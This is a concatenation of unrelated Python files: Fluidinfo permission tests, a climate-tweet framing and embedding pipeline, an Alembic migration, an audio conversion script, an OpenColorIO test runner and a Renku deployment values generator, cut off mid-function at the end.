('store', DatabaseResource())]
def setUp(self):
super(SecureNamespaceAPIWithBrokenCacheTest, self).setUp()
self.system = createSystemData()
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.namespaces = SecureNamespaceAPI(self.user)
self.permissions = CachingPermissionAPI(self.user)
class SecureNamespaceAPIWithAnonymousRoleTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('store', DatabaseResource())]
def setUp(self):
super(SecureNamespaceAPIWithAnonymousRoleTest, self).setUp()
self.system = createSystemData()
self.user = self.system.users[u'anon']
self.namespaces = SecureNamespaceAPI(self.user)
def testCreateIsDenied(self):
"""
L{SecureNamespaceAPI.create} raises a L{PermissionDeniedError} if its
invoked by a L{User} with the L{Role.ANONYMOUS}.
"""
error = self.assertRaises(PermissionDeniedError,
self.namespaces.create,
[(u'anon/test', u'description')])
self.assertEqual(self.user.username, error.username)
self.assertEqual([(u'anon', Operation.CREATE_NAMESPACE)],
sorted(error.pathsAndOperations))
def testDeleteIsDenied(self):
"""
L{SecureNamespaceAPI.delete} raises a L{PermissionDeniedError} if its
invoked by a L{User} with the L{Role.ANONYMOUS}.
"""
error = self.assertRaises(PermissionDeniedError,
self.namespaces.delete,
[u'anon'])
self.assertEqual(self.user.username, error.username)
self.assertEqual([(u'anon', Operation.DELETE_NAMESPACE)],
sorted(error.pathsAndOperations))
def testSetIsDenied(self):
"""
L{SecureNamespaceAPI.set} raises a L{PermissionDeniedError} if its
invoked by a L{User} with the L{Role.ANONYMOUS}.
"""
error = self.assertRaises(PermissionDeniedError,
self.namespaces.set,
{u'anon': u'new description'})
self.assertEqual(self.user.username, error.username)
self.assertEqual([(u'anon', Operation.UPDATE_NAMESPACE)],
sorted(error.pathsAndOperations))
def testGetChildNamespacesIsAllowed(self):
"""
L{SecureNamespaceAPI.get} should allow getting a list of child
namespaces if the I{anon} user has permissions.
"""
admin = self.system.users[u'fluiddb']
SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb', Operation.LIST_NAMESPACE, Policy.OPEN, [])]
CachingPermissionAPI(admin).set(values)
result = self.namespaces.get([u'fluiddb'], withNamespaces=True)
self.assertEqual(1, len(result))
def testGetChildNamespacesIsDenied(self):
"""
L{SecureNamespaceAPI.get} should raise L{PermissonDeniedError} if the
I{anon} user doesn't have LIST permissions when trying to get the child
namespaces.
"""
admin = self.system.users[u'fluiddb']
SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb', Operation.LIST_NAMESPACE, Policy.CLOSED, [])]
CachingPermissionAPI(admin).set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.get,
[(u'fluiddb')], withNamespaces=True)
self.assertEqual([(u'fluiddb', Operation.LIST_NAMESPACE)],
sorted(error.pathsAndOperations))
def testGetChildTagsIsAllowed(self):
"""
L{SecureNamespaceAPI.get} should allow getting a list of child tags if
the I{anon} user has permissions.
"""
admin = self.system.users[u'fluiddb']
SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb', Operation.LIST_NAMESPACE,
Policy.CLOSED, [u'anon'])]
CachingPermissionAPI(admin).set(values)
result = self.namespaces.get([u'fluiddb'], withTags=True)
self.assertEqual(1, len(result))
def testGetChildTagsIsDenied(self):
"""
L{SecureNamespaceAPI.get} should raise L{PermissonDeniedError} if the
L{anon} user doesn't have LIST permissions when trying to get the
child tags.
"""
admin = self.system.users[u'fluiddb']
SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb', Operation.LIST_NAMESPACE,
Policy.OPEN, [u'anon'])]
CachingPermissionAPI(admin).set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.get,
[(u'fluiddb')], withTags=True)
self.assertEqual([(u'fluiddb', Operation.LIST_NAMESPACE)],
sorted(error.pathsAndOperations))
class SecureNamespaceAPIWithNormalUserTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('store', DatabaseResource())]
def setUp(self):
super(SecureNamespaceAPIWithNormalUserTest, self).setUp()
createSystemData()
UserAPI().create([(u'user', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'user')
self.permissions = CachingPermissionAPI(self.user)
self.namespaces = SecureNamespaceAPI(self.user)
def testCreateIsAllowed(self):
"""
L{SecureNamespaceAPI.create} should allow the creation of namespaces
whose parent has open CREATE permissions.
"""
values = [(u'user', Operation.CREATE_NAMESPACE, Policy.OPEN, [])]
self.permissions.set(values)
result = self.namespaces.create([(u'user/test', u'description')])
self.assertEqual(1, len(result))
def testCreateIsDenied(self):
"""
L{SecureNamespaceAPI.create} should raise L{PermissonDeniedError} if
the user doesn't have CREATE permissions on the parent namespace.
"""
values = [(u'user', Operation.CREATE_NAMESPACE, Policy.CLOSED, [])]
self.permissions.set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.create,
[(u'user/test', u'description')])
self.assertEqual([(u'user', Operation.CREATE_NAMESPACE)],
sorted(error.pathsAndOperations))
def testDeleteIsAllowed(self):
"""
{SecureNamespaceAPI.delete} should allow the deletion of a namespace
if the user has DELETE permissions.
"""
result1 = self.namespaces.create([(u'user/test', u'description')])
values = [(u'user/test', Operation.DELETE_NAMESPACE, Policy.OPEN, [])]
self.permissions.set(values)
result2 = self.namespaces.delete([u'user/test'])
self.assertEqual(result1, result2)
def testDeleteIsDenied(self):
"""
L{SecureNamespaceAPI.delete} should raise L{PermissonDeniedError} if
the user doesn't have DELETE permissions.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user/test', Operation.DELETE_NAMESPACE,
Policy.OPEN, [u'user'])]
self.permissions.set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.delete, [(u'user/test')])
self.assertEqual([(u'user/test', Operation.DELETE_NAMESPACE)],
sorted(error.pathsAndOperations))
def testGetChildNamespacesIsAllowed(self):
"""
L{SecureNamespaceAPI.get} should allow getting a list of child
namespaces if the user has permissions.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user', Operation.LIST_NAMESPACE, Policy.OPEN, [])]
self.permissions.set(values)
result = self.namespaces.get([u'user'], withNamespaces=True)
self.assertEqual(1, len(result))
def testGetChildNamespacesIsDenied(self):
"""
L{SecureNamespaceAPI.get} should raise L{PermissonDeniedError} if the
user doesn't have LIST permissions when trying to get the child
namespaces.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user', Operation.LIST_NAMESPACE, Policy.CLOSED, [])]
self.permissions.set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.get,
[(u'user')], withNamespaces=True)
self.assertEqual([(u'user', Operation.LIST_NAMESPACE)],
sorted(error.pathsAndOperations))
def testGetChildTagsIsAllowed(self):
"""
L{SecureNamespaceAPI.get} should allow getting a list of child tags if
the user has permissions.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user', Operation.LIST_NAMESPACE,
Policy.CLOSED, [u'user'])]
self.permissions.set(values)
result = self.namespaces.get([u'user'], withTags=True)
self.assertEqual(1, len(result))
def testGetChildTagsIsDenied(self):
"""
L{SecureNamespaceAPI.get} should raise L{PermissonDeniedError} if the
user doesn't have LIST permissions when trying to get the child
tags.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user', Operation.LIST_NAMESPACE, Policy.OPEN, [u'user'])]
self.permissions.set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.get,
[(u'user')], withTags=True)
self.assertEqual([(u'user', Operation.LIST_NAMESPACE)],
sorted(error.pathsAndOperations))
def testSetIsAllowed(self):
"""
L{SecureNamespaceAPI.get} should allow updating the description of a
namespace if the user has permissions.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user/test', Operation.UPDATE_NAMESPACE, Policy.OPEN, [])]
self.permissions.set(values)
self.namespaces.set({u'user/test': u'description'})
def testSetIsDenied(self):
"""
L{SecureNamespaceAPI.get} should raise L{PermissonDeniedError} if the
user doesn't have UPDATE permissions when trying to update a
namespace's description.
"""
self.namespaces.create([(u'user/test', u'description')])
values = [(u'user/test', Operation.UPDATE_NAMESPACE,
Policy.CLOSED, [])]
self.permissions.set(values)
error = self.assertRaises(PermissionDeniedError,
self.namespaces.set,
{u'user/test': u'description'})
self.assertEqual([(u'user/test', Operation.UPDATE_NAMESPACE)],
sorted(error.pathsAndOperations))
class SecureNamespaceAPIWithSuperuserTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('store', DatabaseResource())]
def setUp(self):
super(SecureNamespaceAPIWithSuperuserTest, self).setUp()
system = createSystemData()
user = system.users[u'fluiddb']
self.namespaces = SecureNamespaceAPI(user)
self.permissions = CachingPermissionAPI(user)
def testCreateIsAllowed(self):
"""
Creating a new L{Namespace} should be allowed if we're a user with a
L{Role.SUPERUSER} no matter what permissions we have.
"""
values = [(u'fluiddb', Operation.CREATE_NAMESPACE, Policy.CLOSED, [])]
self.permissions.set(values)
result = self.namespaces.create([(u'fluiddb/test', u'description')])
self.assertEqual(1, len(result))
def testDeleteIsAllowed(self):
"""
Deleting a L{Namespace} should be allowed if we're a user with a
L{Role.SUPERUSER} no matter what permissions we have.
"""
result1 = self.namespaces.create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb/test', Operation.DELETE_NAMESPACE,
Policy.CLOSED, [])]
self.permissions.set(values)
result2 = self.namespaces.delete([u'fluiddb/test'])
self.assertEqual(result1, result2)
def testSetIsAllowed(self):
"""
Updating a L{Namespace} should be allowed if we're a user with a
L{Role.SUPERUSER} no matter what permissions we have.
"""
self.namespaces.create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb/test', Operation.UPDATE_NAMESPACE,
Policy.CLOSED, [])]
self.permissions.set(values)
self.namespaces.set({u'fluiddb/test': u'new description'})
def testGetIsAllowed(self):
"""
Getting information about a L{Namespace} should be allowed if we're a
user with a L{Role.SUPERUSER} no matter what permissions we have.
"""
self.namespaces.create([(u'fluiddb/test', u'description')])
values = [(u'fluiddb/test', Operation.LIST_NAMESPACE,
Policy.CLOSED, [])]
self.permissions.set(values)
result = self.namespaces.get([u'fluiddb'], withDescriptions=False,
withTags=True, withNamespaces=True)
self.assertEqual(1, len(result))
|
"""
Description of frames from Table S2 in "Supplimentary Information for Dominant Frames in Legacy and Social Media
Coverage of the IPCC Fifth Assessment Report"
Some description has been left out like mentions of other frames, punctuation removed, everything lowercased,
entities joined by _
ss Settled Science
us Uncertain (and contested) Science
pis Political or Ideological Struggle
d Disaster
o1 & o2 Opportunity
e1 & e2 Economic
me1 & me2 Morality and Ethics
ros Role of Science
s Security
h Health
column 1 socio-political context of frame
column 2 problem definition, moral judgement, remedy
column 3 typical sources
column 4 themes or storylines
column 5 language, metaphors, phrases
column 6 visual imagery
"""
import json
import time
from sentence_transformers import SentenceTransformer
from redditscore.tokenizer import CrazyTokenizer
from nltk.tokenize import sent_tokenize
import os
import tensorflow as tf
from tweet_parser.tweet import Tweet
import pandas as pd
from sqlalchemy.dialects.postgresql import ARRAY
from crate.client.sqlalchemy.types import Object
from sqlalchemy.types import String, DateTime, Float
import numpy as np
from tqdm import tqdm
import tensorflow_hub as hub
import pickle
import emoji
import re
pd.set_option('display.max_columns', None)
np.set_printoptions(threshold=np.prod((10, 1050)))
use_embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder/4")
roberta_model = SentenceTransformer('roberta-large-nli-stsb-mean-tokens')
rule_poli = re.compile(r'[pP][oO][lL][iI]')
rule_govt = re.compile(r'[gG][oO][vV][tT]')
rule_2c = re.compile(r"""\d+[cC] | # e.g. 2c
\d+\.\d+[cC] | # e.g. 1.5C
\d+º[cC] | # e.g. 2ºC
\d+\.\d+º[cC] # e.g. 1.5ºc
""", re.X)
rule_mdg = re.compile(r'[mM][dD][gG][sS]|[mM][dD][gG]')
rule_ipcc = re.compile(r'[iI][pP][cC][cC]')
rule_un = re.compile(r'\s[uU][nN]\s')
rule_who = re.compile(r'\s[W][H][O]\s')
extra_patterns = [(rule_2c, ' degree celsius '),
(rule_mdg, ' Millennium Development Goal '),
(rule_poli, ' politics '),
(rule_govt, ' government '),
(rule_ipcc, ' Intergovernmental Panel on Climate Change '),
(rule_un, ' United Nations '),
(rule_who, ' World Health Organization ')]
phrase_tokenizer = CrazyTokenizer(lowercase=False,
keepcaps=True,
hashtags='split',
remove_punct=False,
decontract=True,
# extra_patterns=extra_patterns,
twitter_handles='',
urls='',
whitespaces_to_underscores=False)
def phrase_tokenize(text):
all_phrases = {}
phrases = sent_tokenize(text)
for i in range(len(phrases)):
phrase = phrases[i]
for pattern in extra_patterns:
phrase = re.sub(pattern[0], pattern[1], phrase)
tokens = phrase_tokenizer.tokenize(phrase)
tokens = [token if not emoji.is_emoji(token) else token.strip(':').replace('_', ' ') for token in tokens]
all_phrases['sentence_{}'.format(i)] = {'tokens': tokens, 'phrase': ' '.join(tokens)}
return all_phrases
def check_array_size(a):
size = len(a.encode('utf-8'))
try:
assert size < 32766
except:
print("size: ", size)
frame_list = [
'settled_science'] * 18 + [
'uncertain_science'] * 18 + [
'political_or_ideological_struggle'] * 11 + [
'disaster'] * 18 + [
'opportunity'] * 23 + [
'economic'] * 19 + [
'morality_and_ethics'] * 13 + [
'role_of_science'] * 24 + [
'security'] * 15 + [
'health'] * 13
element_id_list = list(range(18)) + list(range(18)) + list(range(11)) + list(range(18)) + list(range(23)) + \
list(range(19)) + list(range(13)) + list(range(24)) + list(range(15)) + list(range(13))
element_list = [
# settled science
"there is broad expert scientific consensus",
"considerable evidence of the need for action",
"science has spoken",
"politicians must act in terms of global agreements",
"exhaustive Intergovernmental Panel on Climate Change report produced by thousands of expert scientists",
"unprecedented rate of change compared to paleo records",
"carbon budget emissions allowance in order to meet 2 degrees celsius policy target",
"severe and irreversible impacts",
"trust climate scientists and dismiss skeptic voices",
"settled science",
"unequivocal nature of anthropogenic climate change",
"landmark report by Intergovernmental Panel on Climate Change",
"the balance of evidence",
"what more proof do we need",
"greatest challenge of our time",
"skeptics wishful thinking or malpractice",
"go read the Intergovernmental Panel on Climate Change report",
"citing sources of information",
# uncertain science
"there is still a lack of scientific evidence to justify action",
"uncertainty in climate science impacts or solutions",
"question anthropogenic nature of climate change",
"natural variability",
"science has been wrong before and still lacks knowledge",
"we cannot should not or will struggle to act",
"unexplained pause in global mean temperature warming",
"Climatic Research Unit stolen emails",
"climategate",
"errors in Intergovernmental Panel on Climate Change",
"a pause in warming or slowdown",
"we cannot be sure despite scientists best efforts",
"scientists making errors or mistakes",
"hysteria and silliness",
"scientists admit or insist or are puzzled",
"scientists attempt to prove climate change",
"global warming believers",
"climate change hoax",
# political or ideological struggle
"a political or ideological conflict over the way the world should work",
"conflict over solutions or strategy to address issues",
"a battle for power between nations groups or personalities",
"detail of specific policies",
"green new deal",
"climate change act",
"disagreement over policies and policy detail",
"questioning the motives or funding of opponents",
"a battle or war or fierce debate of ideas",
"government strategy confused",
"how can the other political side ignore these scientific truths and not act",
# disaster
"predicted impacts are dire with severe consequences",
"impacts are numerous and threaten all aspects of life",
"impacts will get worse and we are not well prepared",
"unprecedented rise in global average surface temperature",
"sea level rise",
"snow and ice decline",
"decline in coral reefs",
"extreme weather including droughts heatwaves floods",
"scale of the challenge is overwhelming",
"positively frightening",
"unnatural weather",
"weather on steroids",
"violent or extreme weather",
"runaway climate change",
"life is unsustainable",
"threatened species or ecosystems",
"disaster-stricken people",
"entire ecosystems are collapsing",
# opportunity
"climate change poses opportunities",
"reimagine how we live",
"further human development",
"invest in co-benefits",
"climate change is rich with opportunity",
"time for innovation or creativity",
"improve lives now and in the future",
"take personal action",
"change in lifestyle choices",
"change diet go vegan or vegetarian",
"eco-friendly and sustainable cities and management",
"eco-friendly and sustainable lifestyle",
"reduce carbon footprint",
"adapt to challenges",
"adaptation strategies",
"carbon dioxide fertilization for agriculture",
"beneficial impacts of changing climate",
"no intervention needed",
"melting arctic will lead to opening up of shipping routes",
"new trade opportunities",
"increased agricultural productivity through increasing atmospheric carbon dioxide fertilization",
"opportunity to transform trade",
"increased resource extraction",
# economic
"economic growth prosperity investments and markets",
"high monetary costs of inaction",
"the economic case provides a strong argument for action now",
"divestment from fossil fuels like oil and gas",
"cost of mitigating climate change is high but the cost will be higher if we do not act now",
"action now can create green jobs",
"economic growth and prosperity",
"costs and economic estimates",
"billions of dollars of damage in the future if no action is taken now",
"it will not cost the world to save the planet",
"high monetary costs of action",
"action is hugely expensive or simply too costly in the context of other priorities",
"scientific uncertainty",
"United Nations is proposing climate plans which will damage economic growth",
"action at home now is unfair as Annex II countries will gain economic advantage",
"action will damage economic growth",
"it is no time for panicky rearranging of the global economy",
"killing industry",
"imposing costly energy efficiency requirements",
# morality and ethics
"an explicit and urgent moral religious or ethical call for action",
"strong mitigation and protection of the most vulnerable",
"God ethics and morality",
"climate change linked to poverty",
"ending world hunger",
"Millennium Development Goal",
"exert moral pressure",
"degradation of nature",
"ruining the planet or creation",
"people or nations at the front line of climate change for the most vulnerable and already exposed",
"responsibility to protect nature",
"there is no planet B",
"globalist climate change religion",
# role of science
"process or role of science in society",
"how the Intergovernmental Panel on Climate Change works or does not",
"transparency in funding",
"awareness of science",
"institutions involving scientists like the Intergovernmental Panel on Climate Change",
"public opinion understanding and knowledge",
"bias in media sources",
"giving contrarians a voice",
"not broadcasting diverse views",
"Intergovernmental Panel on Climate Change is a leading institution",
"politicisation of science",
"Intergovernmental Panel on Climate Change is too conservative or alarmist",
"detail how Intergovernmental Panel on Climate Change process works",
"amount of time and space given to contrarians or skeptics in the media",
"threats to free speech",
"false balance",
"balance as bias",
"sexed up science",
"belief in scientists as a new priesthood of the truth",
"misinformation and propaganda",
"fake news media",
"hidden agenda and mainstream narrative",
"suppression of information",
"conflict of interest",
# security
"threat to human energy",
"threat to water supply",
"threat to food security",
"threats to the nation state especially over migration",
"conflict might be local but could be larger in scale and endanger many",
"conflicts may occur between developed and developing countries",
"conflict between nature and humans",
"conflict between different stakeholders in developed nations",
"climate change as a threat multiplier",
"increase in instability volatility and tension",
"fighting for water security",
"a danger to world peace",
"impacts on security usually related to food drought or migration",
"armed forces preparing for war",
"people are being displaced",
# health
"severe danger to human health",
"deaths from malnutrition",
"deaths from insect-borne diseases",
"poor air quality",
"urgent mitigation and adaptation required",
"vulnerability of Annex II countries",
"vulnerability of children and elders to health impacts",
"details of health impacts from climate change",
"health wellbeing livelihoods and survival are compromised",
"financial cost of impacts to human health",
"mental health issues",
"worsening environmental and air pollution",
"climate change is a global problem and affects everyone"
]
element_use = use_embed(element_list).numpy()
element_roberta = roberta_model.encode(element_list)
element_roberta_norm = tf.keras.utils.normalize(element_roberta, axis=-1, order=2)
frames = {
"element_id": element_id_list,
"frame": frame_list,
"element_txt": element_list,
"element_use": element_use.tolist(),
"element_roberta": element_roberta.tolist(),
"element_roberta_norm": element_roberta_norm.tolist()
}
element_df = pd.DataFrame(frames)
element_df.to_sql('frame_elements', 'crate://localhost:4200', if_exists='append', index=False, dtype={
'element_use': ARRAY(Float),
'element_roberta': ARRAY(Float),
'element_roberta_norm': ARRAY(Float)
})
ids = []
table = []
split = []
created_at_datetime = []
screen_name = []
bio = []
txt = []
processed = []
use_embeddings = []
use_median = []
use_avg = []
roberta_embeddings = []
roberta_median = []
roberta_avg = []
roberta_embeddings_norm = []
roberta_median_norm = []
roberta_avg_norm = []
with open('sample.jsonl', 'r') as infile:
for line in tqdm(infile, desc='tweets'):
start_time = time.time()
tweet_dict = json.loads(line)
tweet = Tweet(tweet_dict)
if tweet.user_entered_text != '' and tweet.lang == 'en':
ids.append(tweet.id)
table.append('climate_tweets')
split.append('sample')
created_at_datetime.append(tweet.created_at_datetime)
screen_name.append(tweet.screen_name)
bio.append(tweet.bio)
txt.append(tweet.user_entered_text)
p = phrase_tokenize(tweet.user_entered_text)
processed.append(json.dumps(p))
s = [p[s]['phrase'] for s in p]
ue = use_embed(s).numpy()
use_embeddings.append(np.array_repr(ue))
# use_embeddings.append(ue.tolist())
use_median.append(np.array_repr(np.median(ue, axis=0)))
# use_median.append(np.median(ue, axis=0).tolist())
use_avg.append(np.array_repr(np.average(ue, axis=0)))
# use_avg.append(np.average(ue, axis=0).tolist())
rob = roberta_model.encode(s)
roberta_embeddings.append(np.array_repr(rob))
# roberta_embeddings.append(rob.tolist())
# print(rob.shape)
rob_med = np.median(rob, axis=0)
roberta_median.append(np.array_repr(rob_med))
# roberta_median.append(rob_med.tolist())
# print(rob_med.shape)
rob_avg = np.average(rob, axis=0)
# print(rob_avg.shape)
roberta_avg.append(np.array_repr(rob_avg))
# roberta_avg.append(rob_avg.tolist())
rob_norm = tf.keras.utils.normalize(rob, axis=-1, order=2)
# print(rob_norm.shape)
roberta_embeddings_norm.append(np.array_repr(rob_norm))
rob_med_norm = tf.keras.utils.normalize(rob_med, axis=-1, order=2).flatten()
# print(rob_med_norm.shape)
roberta_median_norm.append(np.array_repr(rob_med_norm))
rob_avg_norm = tf.keras.utils.normalize(rob_avg, axis=-1, order=2).flatten()
roberta_avg_norm.append(np.array_repr(rob_avg_norm))
# print(rob_avg_norm.shape)
if len(ids) == 50:
tweets_df = pd.DataFrame({
'id': ids,
'table_name': table,
'split': split,
'created_at_datetime': created_at_datetime,
'screen_name': screen_name,
'bio': bio,
'txt': txt,
'txt_clean_sentences': processed,
'txt_clean_use': use_embeddings,
'use_median': use_median,
'use_average': use_avg,
'txt_clean_roberta': roberta_embeddings,
'roberta_median': roberta_median,
'roberta_average': roberta_avg,
'txt_clean_roberta_norm': roberta_embeddings_norm,
'roberta_norm_median': roberta_median_norm,
'roberta_norm_average': roberta_avg_norm
})
tweets_df['txt_clean_roberta'].apply(check_array_size)
tweets_df['txt_clean_roberta_norm'].apply(check_array_size)
tweets_df.to_sql('climate_tweets', 'crate://localhost:4200', if_exists='append', index=False,
dtype={'created_at_datetime': DateTime,
'txt_clean_sentences': Object})
ids = []
table = []
split = []
created_at_datetime = []
screen_name = []
bio = []
txt = []
processed = []
sentences = []
use_embeddings = []
use_median = []
use_avg = []
roberta_embeddings = []
roberta_median = []
roberta_avg = []
roberta_embeddings_norm = []
roberta_median_norm = []
roberta_avg_norm = []
end_time = time.time()
print("total time taken this loop: ", end_time - start_time)
tweets_df = pd.DataFrame({'id': ids,
'table_name': table,
'split': split,
'created_at_datetime': created_at_datetime,
'screen_name': screen_name,
'bio': bio,
'txt': txt,
'txt_clean_sentences': processed,
'txt_clean_use': use_embeddings,
'use_median': use_median,
'use_average': use_avg
# 'txt_clean_roberta': roberta_embeddings,
# 'roberta_median': roberta_median,
# 'roberta_average': roberta_avg,
# 'txt_clean_roberta_norm': roberta_embeddings_norm,
# 'roberta_median_norm': roberta_median_norm,
# 'roberta_average_norm': roberta_avg_norm
})
# tweets_df['txt_clean_roberta'].apply(check_array_size)
# tweets_df['txt_clean_roberta_norm'].apply(check_array_size)
# print(tweets_df)
tweets_df.to_sql('climate_tweets', 'crate://localhost:4200', if_exists='append', index=False,
dtype={'created_at_datetime': DateTime,
'txt_clean_sentences': Object})
|
"""Add a size table
Revision ID: 8e8e52357e77
Revises: 0d1c3d81d948
Create Date: 2021-09-21 09:06:01.221871
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8e8e52357e77'
down_revision = '0d1c3d81d948'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('size',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('price', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('size')
# ### end Alembic commands ###
|
#! /usr/bin/python
### Convert Audio for iPhone Project
import os.path
import subprocess
import shutil
def main():
dir = '/Users/Liz/Dropbox/Projects/BoardGame/Sound'
files = os.listdir(dir)
os.chdir(dir)
for file in files:
if file.endswith('m4a'):
newfile = file.replace('m4a','caf')
print(newfile)
commandlist = ['/usr/bin/afconvert', '-f', 'caff', '-d', 'LEI16',file,newfile]
subprocess.call(commandlist)
os.remove(file)
if __name__ == '__main__':
main() |
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
import unittest, os, sys
build_location = sys.argv[1]
opencolorio_sse = sys.argv[2].lower() == 'true'
opencolorio_dir = os.path.join(build_location, "src", "OpenColorIO")
pyopencolorio_dir = os.path.join(build_location, "src", "bindings", "python")
if os.name == 'nt':
# On Windows we must append the build type to the build dirs and add the main library to PATH
# Note: Only when compiling within Microsoft Visual Studio editor i.e. not on command line.
if len(sys.argv)==4:
opencolorio_dir = os.path.join(opencolorio_dir, sys.argv[3])
pyopencolorio_dir = os.path.join(pyopencolorio_dir, sys.argv[3])
os.environ['PATH'] = "{0};{1}".format(opencolorio_dir, os.environ.get('PATH',""))
elif sys.platform == 'darwin':
# On OSX we must add the main library location to DYLD_LIBRARY_PATH
os.environ['DYLD_LIBRARY_PATH'] = "{0}:{1}".format(opencolorio_dir, os.environ.get('DYLD_LIBRARY_PATH', ""))
sys.path.insert(0, pyopencolorio_dir)
import PyOpenColorIO as OCIO
from MainTest import *
from ConstantsTest import *
from ConfigTest import *
from ContextTest import *
from LookTest import *
from ColorSpaceTest import *
from GpuShaderDescTest import *
from Baker import *
from TransformsTest import *
from CDLTransformTest import *
from RangeTransformTest import *
class FooTest(unittest.TestCase):
def test_interface(self):
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(MainTest("test_interface"))
suite.addTest(ConstantsTest("test_interface"))
suite.addTest(ConfigTest("test_interface"))
suite.addTest(ConfigTest("test_is_editable"))
suite.addTest(ContextTest("test_interface"))
suite.addTest(LookTest("test_interface"))
suite.addTest(ColorSpaceTest("test_interface"))
suite.addTest(CDLTransformTest("test_interface"))
suite.addTest(CDLTransformTest("test_equality"))
suite.addTest(CDLTransformTest("test_validation"))
suite.addTest(RangeTransformTest("test_interface"))
suite.addTest(RangeTransformTest("test_equality"))
suite.addTest(RangeTransformTest("test_validation"))
suite.addTest(TransformsTest("test_interface"))
# Processor
# ProcessorMetadata
suite.addTest(GpuShaderDescTest("test_interface"))
suite.addTest(BakerTest("test_interface", opencolorio_sse))
# PackedImageDesc
# PlanarImageDesc
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner(verbosity=2)
test_suite = suite()
result = runner.run(test_suite)
if result.wasSuccessful() == False:
sys.exit(1)
sys.exit(0)
|
#!/usr/bin/env python3
import argparse
import re
import subprocess
import sys
import ruamel.yaml
from prompt_toolkit import prompt
yaml = ruamel.yaml.YAML()
yaml.preserve_quotes = True
def merge_values(v1, v2):
for k, v in v2.items():
if isinstance(v, dict):
node = v1.setdefault(k, {})
merge_values(node, v)
v1.setdefault(k, v)
return v1
def recurse_dict_secrets(d, path=""):
"""Recursively populate values."""
secret_regex = re.compile("<use \`(.*)\`>")
for k, v in d.items():
if isinstance(v, dict):
d[k] = recurse_dict_secrets(v, path="{path}.{k}".format(path=path, k=k))
else:
if isinstance(v, str):
if secret_regex.match(v):
command = secret_regex.findall(v)[0]
d[k] = subprocess.check_output(command, shell=True).decode().strip()
print("Adding secret {path}.{k}".format(path=path, k=k))
return d
def main():
"""Render a basic Renku values file."""
print("----------------------------")
print("| Configuring Renku values |")
print("----------------------------")
argparser = argparse.ArgumentParser(description=__doc__)
argparser.add_argument(
"--namespace", help="Namespace for the deployment"
)
argparser.add_argument("--gitlab", help="Deploy GitLab as a part of Renku",
action=argparse.BooleanOptionalAction, default=False
)
argparser.add_argument("--gitlab-url", help="Gitlab URL")
argparser.add_argument(
"--gitlab-registry",
help="Gitlab Image Registry URL"
)
argparser.add_argument("--gitlab-client-id", help="Gitlab client ID")
argparser.add_argument(
"--gitlab-client-secret", help="Gitlab client secret"
)
argparser.add_argument("--renku-domain", help="Renku domain")
argparser.add_argument(
"--template", help="Values template to use", default="base-renku-values.yaml.template"
)
argparser.add_argument(
"--output", "-o", help="Output file"
)
args = argparser.parse_args()
namespace = args.namespace or prompt("Namespace: ", default="renku")
# we must have a renku domain
renku_domain = args.renku_domain or prompt("Renku domain: ", default="renku.example.com")
# check if gitlab is being deployed - if not make sure we have the client configuration
if not args.gitlab:
gitlab_url = (
args.gitlab_url or prompt("GitLab URL: ")
)
gitlab_client_id = (
args.gitlab_client_id or prompt("GitLab client id: ")
)
gitlab_client_secret = (
args.gitlab_client_secret or prompt("GitLab client secret: ")
)
gitlab_registry = (
args.gitlab_registry or prompt("Gitlab registry hostname: ", default=f"registry.{renku_domain}")
)
if not (gitlab_url and gitlab_client_id and gitlab_client_secret and gitlab_registry):
raise RuntimeError(
"If not deploying own GitLab, you must specify the GitLab URL, client id and client secret."
)
else:
gitlab_url = f"https://{renku_domain}/gitlab"
gitlab_registry = f"registry.{renku_domain}"
# read in the template and set the values
with open(args.template) as f:
t = f.read().format(
namespace=namespace,
renku_domain=renku_domain,
gitlab_registry=gitlab_registry,
gitlab_url=gitlab_url
)
values = yaml.load(t)
# if a key is set to '<use `openssl rand -hex 32`>' automatically generate the secret
values = recurse_dict_secrets(values)
if args.gitlab:
values["gitlab"]["enabled"] = True
values["global"]["gitlab"]["urlPrefix"] = "/gitlab"
else:
values["global"]["gateway"]["gitlabClientId"] = gitlab_client_id
values["global"]["gateway"]["gitlabClientSecret"] = gitlab_client_secret
values["gitlab"] = {"enabled": False}
warning = """
# This is an automatically generated values file to deploy Renku.
# Please scrutinize it carefully before trying to deploy.
"""
if args.gitlab:
warning += """
# GitLab values are incomplete; git-LFS and the registry storage are not configured.
# See the main Renku values file for reference and an example.
"""
if args.output:
with open(args.output, "w") as f:
f.write(warning)
